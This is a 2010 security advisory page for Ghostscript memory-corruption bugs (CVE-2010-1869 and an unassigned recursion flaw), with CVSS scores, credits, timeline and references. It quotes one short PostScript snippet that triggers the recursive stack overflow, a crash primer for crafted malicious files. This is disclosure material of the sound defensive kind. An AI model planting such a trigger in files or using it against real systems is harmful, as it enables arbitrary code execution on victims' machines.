Ghostscript, multiple arbitrary code execution vulnerabilities

2010.05.25
Credit: Dan Rosenberg
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

=============================================================== Ghostscript, multiple arbitrary code execution vulnerabilities May 11, 2010 CVE-2010-1869 =============================================================== ==Description== Ghostscript (www.ghostscript.com), an interpreter for the PostScript language, is vulnerable to two memory corruption vulnerabilities: 1. A stack overflow in the parser for Ghostscript versions 8.64 and 8.70 occurs when very long identifiers are provided within a PostScript file. By enticing a user to open a maliciously crafted PostScript file, arbitrary code execution can be achieved. This vulnerability was reported to downstream distributions by me on March 4, 2010. An anonymous researcher independently published this vulnerability today (May 11, 2010), prompting this advisory. This issue has been assigned CVE-2010-1869. 2. GhostScript (all tested versions) fails to properly handle infinitely recursive procedure invocations. By providing a PostScript file with a sequence such as: /A{pop 0 A 0} bind def /product A 0 the interpreter's internal stack will be overflowed with recursive calls, at which point execution will jump to an attacker-controlled address. This vulnerability can be exploited by enticing a user to open a maliciously crafted PostScript file, achieving arbitrary code execution. This issue has not yet been assigned a CVE identifier. ==Solution== In the absence of a patch, users are encouraged to discontinue use of Ghostscript or avoid processing untrusted PostScript files. ==Credits== These vulnerabilities were discovered by Dan Rosenberg (dan.j.rosenberg (at) gmail (dot) com [email concealed]). ==Timeline== 3/04/10 - Initial report to downstream distribution 5/11/10 - Anonymous researcher discloses first issue 5/11/10 - Disclosure ==References== CVE identifier CVE-2010-1869 has been assigned to the first issue. The original report for this bug can be found at: https://bugs.launchpad.net/ubuntu/+source/ghostscript/+bug/546009

References:

https://bugs.launchpad.net/ubuntu/+source/ghostscript/+bug/546009
http://www.vupen.com/english/advisories/2010/1138
http://www.securityfocus.com/bid/40107
http://www.securityfocus.com/archive/1/archive/1/511243/100/0/threaded
http://www.openwall.com/lists/oss-security/2010/05/18/7
http://www.openwall.com/lists/oss-security/2010/05/12/1
http://secunia.com/advisories/39753
http://seclists.org/fulldisclosure/2010/May/134
http://bugs.ghostscript.com/show_bug.cgi?id=691295


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top